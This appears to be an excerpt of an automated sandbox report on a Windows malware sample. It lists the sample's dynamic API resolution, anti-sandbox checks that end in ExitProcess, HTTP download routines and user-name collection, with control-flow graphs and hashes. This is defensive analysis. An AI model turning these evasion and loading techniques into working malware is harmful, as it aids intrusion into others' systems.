                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$InternetOpen
                        • String ID: "$------
                        • API String ID: 2041821634-2370822465
                        • Opcode ID: 352dc44aeabd182fd41edc13286175836e8bf4ee3eadada1a92ad58e6b7a3f61
                        • Instruction ID: c9eeb7530a248753ec1eea875f82cb8b0079acddea30bcfb79c2ecf30127ee26
                        • Opcode Fuzzy Hash: 352dc44aeabd182fd41edc13286175836e8bf4ee3eadada1a92ad58e6b7a3f61
                        • Instruction Fuzzy Hash: 6752A171A112169BEB21EFB5CC49BAFB7B9AF44314F14402AF805A7351DB78DC41CBA8
                        Function 00466390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2125 466390-4663bd GetPEB 2126 4665c3-466623 LoadLibraryA * 5 2125->2126 2127 4663c3-4665be call 4662f0 GetProcAddress * 20 2125->2127 2129 466625-466633 GetProcAddress 2126->2129 2130 466638-46663f 2126->2130 2127->2126 2129->2130 2132 466641-466667 GetProcAddress * 2 2130->2132 2133 46666c-466673 2130->2133 2132->2133 2134 466675-466683 GetProcAddress 2133->2134 2135 466688-46668f 2133->2135 2134->2135 2136 4666a4-4666ab 2135->2136 2137 466691-46669f GetProcAddress 2135->2137 2139 4666d7-4666da 2136->2139 2140 4666ad-4666d2 GetProcAddress * 2 2136->2140 2137->2136 2140->2139
                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,015823C8), ref: 004663E9
                        • GetProcAddress.KERNEL32(74DD0000,01582458), ref: 00466402
                        • GetProcAddress.KERNEL32(74DD0000,01582350), ref: 0046641A
                        • GetProcAddress.KERNEL32(74DD0000,01582218), ref: 00466432
                        • GetProcAddress.KERNEL32(74DD0000,01589028), ref: 0046644B
                        • GetProcAddress.KERNEL32(74DD0000,015756F0), ref: 00466463
                        • GetProcAddress.KERNEL32(74DD0000,01575710), ref: 0046647B
                        • GetProcAddress.KERNEL32(74DD0000,01582320), ref: 00466494
                        • GetProcAddress.KERNEL32(74DD0000,01582488), ref: 004664AC
                        • GetProcAddress.KERNEL32(74DD0000,01582500), ref: 004664C4
                        • GetProcAddress.KERNEL32(74DD0000,01582290), ref: 004664DD
                        • GetProcAddress.KERNEL32(74DD0000,01575870), ref: 004664F5
                        • GetProcAddress.KERNEL32(74DD0000,015823B0), ref: 0046650D
                        • GetProcAddress.KERNEL32(74DD0000,015823E0), ref: 00466526
                        • GetProcAddress.KERNEL32(74DD0000,01575970), ref: 0046653E
                        • GetProcAddress.KERNEL32(74DD0000,015824A0), ref: 00466556
                        • GetProcAddress.KERNEL32(74DD0000,015822A8), ref: 0046656F
                        • GetProcAddress.KERNEL32(74DD0000,01575A90), ref: 00466587
                        • GetProcAddress.KERNEL32(74DD0000,01582230), ref: 0046659F
                        • GetProcAddress.KERNEL32(74DD0000,01575A30), ref: 004665B8
                        • LoadLibraryA.KERNEL32(01582560,?,?,?,00461C03), ref: 004665C9
                        • LoadLibraryA.KERNEL32(015825C0,?,?,?,00461C03), ref: 004665DB
                        • LoadLibraryA.KERNEL32(01582530,?,?,?,00461C03), ref: 004665ED
                        • LoadLibraryA.KERNEL32(015825D8,?,?,?,00461C03), ref: 004665FE
                        • LoadLibraryA.KERNEL32(015825A8,?,?,?,00461C03), ref: 00466610
                        • GetProcAddress.KERNEL32(75A70000,01582590), ref: 0046662D
                        • GetProcAddress.KERNEL32(75290000,01582578), ref: 00466649
                        • GetProcAddress.KERNEL32(75290000,01582518), ref: 00466661
                        • GetProcAddress.KERNEL32(75BD0000,01582548), ref: 0046667D
                        • GetProcAddress.KERNEL32(75450000,015756D0), ref: 00466699
                        • GetProcAddress.KERNEL32(76E90000,015890A8), ref: 004666B5
                        • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 004666CC
                        Strings
                        • NtQueryInformationProcess, xrefs: 004666C1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: d0a8040137afcc966bbc7f49e606a143248c90dfa0c0f4c8ed0ec31d3cdc70d5
                        • Instruction ID: 46d691cd7972e962e6649a315049315c4e3c09d0fd5138cafd7de4e39924bc41
                        • Opcode Fuzzy Hash: d0a8040137afcc966bbc7f49e606a143248c90dfa0c0f4c8ed0ec31d3cdc70d5
                        • Instruction Fuzzy Hash: 55A14FB56A12009FD758DF68ED48A2A37FBF789754310A51DE91E83360EB34AC80DB71
                        Function 00461BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2141 461bf0-461c0b call 442a90 call 466390 2146 461c0d 2141->2146 2147 461c1a-461c27 call 442930 2141->2147 2148 461c10-461c18 2146->2148 2151 461c35-461c63 2147->2151 2152 461c29-461c2f lstrcpy 2147->2152 2148->2147 2148->2148 2156 461c65-461c67 ExitProcess 2151->2156 2157 461c6d-461c7b GetSystemInfo 2151->2157 2152->2151 2158 461c85-461ca0 call 441030 call 4410c0 GetUserDefaultLangID 2157->2158 2159 461c7d-461c7f ExitProcess 2157->2159 2164 461ca2-461ca9 2158->2164 2165 461cb8-461cca call 462ad0 call 463e10 2158->2165 2164->2165 2166 461cb0-461cb2 ExitProcess 2164->2166 2171 461ce7-461d06 lstrlen call 442930 2165->2171 2172 461ccc-461cde call 462a40 call 463e10 2165->2172 2178 461d23-461d40 lstrlen call 442930 2171->2178 2179 461d08-461d0d 2171->2179 2172->2171 2184 461ce0-461ce1 ExitProcess 2172->2184 2186 461d42-461d44 2178->2186 2187 461d5a-461d7b call 462ad0 lstrlen call 442930 2178->2187 2179->2178 2182 461d0f-461d11 2179->2182 2182->2178 2185 461d13-461d1d lstrcpy lstrcat 2182->2185 2185->2178 2186->2187 2188 461d46-461d54 lstrcpy lstrcat 2186->2188 2193 461d7d-461d7f 2187->2193 2194 461d9a-461db4 lstrlen call 442930 2187->2194 2188->2187 2193->2194 2195 461d81-461d85 2193->2195 2199 461db6-461db8 2194->2199 2200 461dce-461deb call 462a40 lstrlen call 442930 2194->2200 2195->2194 2197 461d87-461d94 lstrcpy lstrcat 2195->2197 2197->2194 2199->2200 2201 461dba-461dc8 lstrcpy lstrcat 2199->2201 2206 461ded-461def 2200->2206 2207 461e0a-461e0f 2200->2207 2201->2200 2206->2207 2208 461df1-461df5 2206->2208 2209 461e16-461e22 call 442930 2207->2209 2210 461e11 call 442a20 2207->2210 2208->2207 2211 461df7-461e04 lstrcpy lstrcat 2208->2211 2215 461e24-461e26 2209->2215 2216 461e30-461e66 call 442a20 * 5 OpenEventA 2209->2216 2210->2209 2211->2207 2215->2216 2217 461e28-461e2a lstrcpy 2215->2217 2228 461e8c-461ea0 CreateEventA call 461b20 call 45ffd0 2216->2228 2229 461e68-461e8a CloseHandle Sleep OpenEventA 2216->2229 2217->2216 2233 461ea5-461eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                        APIs
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,015823C8), ref: 004663E9
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,01582458), ref: 00466402
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,01582350), ref: 0046641A
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,01582218), ref: 00466432
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,01589028), ref: 0046644B
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,015756F0), ref: 00466463
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,01575710), ref: 0046647B
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,01582320), ref: 00466494
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,01582488), ref: 004664AC
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,01582500), ref: 004664C4
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,01582290), ref: 004664DD
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,01575870), ref: 004664F5
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,015823B0), ref: 0046650D
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00461C2F
                        • ExitProcess.KERNEL32 ref: 00461C67
                        • GetSystemInfo.KERNEL32(?), ref: 00461C71
                        • ExitProcess.KERNEL32 ref: 00461C7F
                          • Part of subcall function 00441030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00441046
                          • Part of subcall function 00441030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0044104D
                          • Part of subcall function 00441030: ExitProcess.KERNEL32 ref: 00441058
                          • Part of subcall function 004410C0: GlobalMemoryStatusEx.KERNEL32 ref: 004410EA
                          • Part of subcall function 004410C0: ExitProcess.KERNEL32 ref: 00441114
                        • GetUserDefaultLangID.KERNEL32 ref: 00461C8F
                        • ExitProcess.KERNEL32 ref: 00461CB2
                        • ExitProcess.KERNEL32 ref: 00461CE1
                        • lstrlen.KERNEL32(01588FE8), ref: 00461CEE
                        • lstrcpy.KERNEL32(00000000,?), ref: 00461D15
                        • lstrcat.KERNEL32(00000000,01588FE8), ref: 00461D1D
                        • lstrlen.KERNEL32(00474B98), ref: 00461D28
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00461D48
                        • lstrcat.KERNEL32(00000000,00474B98), ref: 00461D54
                        • lstrlen.KERNEL32(00000000), ref: 00461D63
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00461D89
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00461D94
                        • lstrlen.KERNEL32(00474B98), ref: 00461D9F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00461DBC
                        • lstrcat.KERNEL32(00000000,00474B98), ref: 00461DC8
                        • lstrlen.KERNEL32(00000000), ref: 00461DD7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00461DF9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00461E04
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                        • String ID:
                        • API String ID: 3366406952-0
                        • Opcode ID: 279bb1cf5152c61f48e7f9e9b90e3a542f2d686fc74ae3cab3c7ad9600d111fd
                        • Instruction ID: 2db5734934593d7dd9d98a1b6dd63ec258ba4f6696673b19525fd5e043af0651
                        • Opcode Fuzzy Hash: 279bb1cf5152c61f48e7f9e9b90e3a542f2d686fc74ae3cab3c7ad9600d111fd
                        • Instruction Fuzzy Hash: 1671D531640205ABD724AFB1DD4DB6F36BAAF45705F08102AF90A93271EF789C418B7A
                        Function 00446C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2234 446c40-446c64 call 442930 2237 446c75-446c97 call 444bc0 2234->2237 2238 446c66-446c6b 2234->2238 2242 446c99 2237->2242 2243 446caa-446cba call 442930 2237->2243 2238->2237 2240 446c6d-446c6f lstrcpy 2238->2240 2240->2237 2244 446ca0-446ca8 2242->2244 2247 446cbc-446cc2 lstrcpy 2243->2247 2248 446cc8-446cf5 InternetOpenA StrCmpCA 2243->2248 2244->2243 2244->2244 2247->2248 2249 446cf7 2248->2249 2250 446cfa-446cfc 2248->2250 2249->2250 2251 446d02-446d22 InternetConnectA 2250->2251 2252 446ea8-446ebb call 442930 2250->2252 2254 446ea1-446ea2 InternetCloseHandle 2251->2254 2255 446d28-446d5d HttpOpenRequestA 2251->2255 2259 446ebd-446ebf 2252->2259 2260 446ec9-446ee0 call 442a20 * 2 2252->2260 2254->2252 2257 446e94-446e9e InternetCloseHandle 2255->2257 2258 446d63-446d65 2255->2258 2257->2254 2261 446d67-446d77 InternetSetOptionA 2258->2261 2262 446d7d-446dad HttpSendRequestA HttpQueryInfoA 2258->2262 2259->2260 2265 446ec1-446ec3 lstrcpy 2259->2265 2261->2262 2263 446dd4-446de4 call 463d90 2262->2263 2264 446daf-446dd3 call 4671e0 call 442a20 * 2 2262->2264 2263->2264 2275 446de6-446de8 2263->2275 2265->2260 2277 446e8d-446e8e InternetCloseHandle 2275->2277 2278 446dee-446e07 InternetReadFile 2275->2278 2277->2257 2278->2277 2280 446e0d 2278->2280 2282 446e10-446e15 2280->2282 2282->2277 2283 446e17-446e3d call 467310 2282->2283 2286 446e44-446e51 call 442930 2283->2286 2287 446e3f call 442a20 2283->2287 2291 446e61-446e8b call 442a20 InternetReadFile 2286->2291 2292 446e53-446e57 2286->2292 2287->2286 2291->2277 2291->2282 2292->2291 2293 446e59-446e5b lstrcpy 2292->2293 2293->2291
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 00446C6F
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00446CC2
                        • InternetOpenA.WININET(0046CFEC,00000001,00000000,00000000,00000000), ref: 00446CD5
                        • StrCmpCA.SHLWAPI(?,0158EAA8), ref: 00446CED
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00446D15
                        • HttpOpenRequestA.WININET(00000000,GET,?,0158E4D8,00000000,00000000,-00400100,00000000), ref: 00446D50
                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00446D77
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00446D86
                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00446DA5
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00446DFF
                        • lstrcpy.KERNEL32(00000000,?), ref: 00446E5B
                        • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00446E7D
                        • InternetCloseHandle.WININET(00000000), ref: 00446E8E
                        • InternetCloseHandle.WININET(?), ref: 00446E98
                        • InternetCloseHandle.WININET(00000000), ref: 00446EA2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00446EC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                        • String ID: ERROR$GET
                        • API String ID: 3687753495-3591763792
                        • Opcode ID: 5673dcb9a799576d81c45b58f00692290f8707fe8f90cb3dbb7c1439a07297db
                        • Instruction ID: 4b1e680a6b85edd074c531d6c8273ba45ed79f888ded607956138c9b4f7e3d80
                        • Opcode Fuzzy Hash: 5673dcb9a799576d81c45b58f00692290f8707fe8f90cb3dbb7c1439a07297db
                        • Instruction Fuzzy Hash: B381C671A40215ABEB10DFA4DC49FAF77B9EF45700F10402AF909E7380DB78AD448BA9
                        Function 00444A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2850 444a60-444afc RtlAllocateHeap 2867 444afe-444b03 2850->2867 2868 444b7a-444bbe VirtualProtect 2850->2868 2869 444b06-444b78 2867->2869 2869->2868
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00444AA2
                        • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00444BB0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                        • API String ID: 1542196881-3329630956
                        • Opcode ID: d059502d02fe3d353826f096888119797dad1e0321f3bce42db60a114c54a8f8
                        • Instruction ID: 5cc9d6d1baf6021b4d8aefbc1c6a299396a83f66f9d630092d5f8a487891469f
                        • Opcode Fuzzy Hash: d059502d02fe3d353826f096888119797dad1e0321f3bce42db60a114c54a8f8
                        • Instruction Fuzzy Hash: 1631E7DAB802BC769620EBFF4C47FBFAE55DFC5750B218057760C57180CBA95600CAAA
                        Function 00462A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00462A6F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00462A76
                        • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00462A8A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: d3667f527b7d3eb025ce3d4b80ea1f7361b35932a988a852f0427f432c95180a
                        • Instruction ID: ca4808622eda7bd47fa11dadb6c80ebac4ebb029b459be749481b7b70625841e
                        • Opcode Fuzzy Hash: d3667f527b7d3eb025ce3d4b80ea1f7361b35932a988a852f0427f432c95180a
                        • Instruction Fuzzy Hash: 20F0B4B1A40604AFC700DF88DD49F9EBBBCF704B21F10021AF919E3380D77819448BA1
                        Function 004666E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 633 4666e0-4666e7 634 466afe-466b92 LoadLibraryA * 8 633->634 635 4666ed-466af9 GetProcAddress * 43 633->635 636 466b94-466c03 GetProcAddress * 5 634->636 637 466c08-466c0f 634->637 635->634 636->637 638 466c15-466ccd GetProcAddress * 8 637->638 639 466cd2-466cd9 637->639 638->639 640 466d4f-466d56 639->640 641 466cdb-466d4a GetProcAddress * 5 639->641 642 466d5c-466de4 GetProcAddress * 6 640->642 643 466de9-466df0 640->643 641->640 642->643 644 466df6-466f0b GetProcAddress * 12 643->644 645 466f10-466f17 643->645 644->645 646 466f8d-466f94 645->646 647 466f19-466f88 GetProcAddress * 5 645->647 648 466f96-466fbc GetProcAddress * 2 646->648 649 466fc1-466fc8 646->649 647->646 648->649 650 466ff5-466ffc 649->650 651 466fca-466ff0 GetProcAddress * 2 649->651 652 467002-4670e8 GetProcAddress * 10 650->652 653 4670ed-4670f4 650->653 651->650 652->653 654 4670f6-46714d GetProcAddress * 4 653->654 655 467152-467159 653->655 654->655 656 46716e-467175 655->656 657 46715b-467169 GetProcAddress 655->657 658 467177-4671ce GetProcAddress * 4 656->658 659 4671d3 656->659 657->656 658->659
                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,015757D0), ref: 004666F5
                        • GetProcAddress.KERNEL32(74DD0000,015758D0), ref: 0046670D
                        • GetProcAddress.KERNEL32(74DD0000,01589628), ref: 00466726
